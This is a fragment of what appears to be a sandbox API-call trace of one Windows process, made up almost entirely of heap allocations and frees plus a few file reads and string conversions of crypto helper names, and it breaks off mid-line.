[0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.629] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.629] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x6c09, lpOverlapped=0x0) returned 1 [0031.630] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c09) returned 0x955018 [0031.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c09) returned 0x95bc30 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.631] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c09) returned 0x955018 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.631] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.631] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.631] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c09) returned 0x955018 [0031.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c09) returned 0x88ffb0 [0031.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0031.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0031.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.634] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da218 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.635] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.635] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.636] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0031.637] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.637] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.637] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.639] RtlAllocateHeap 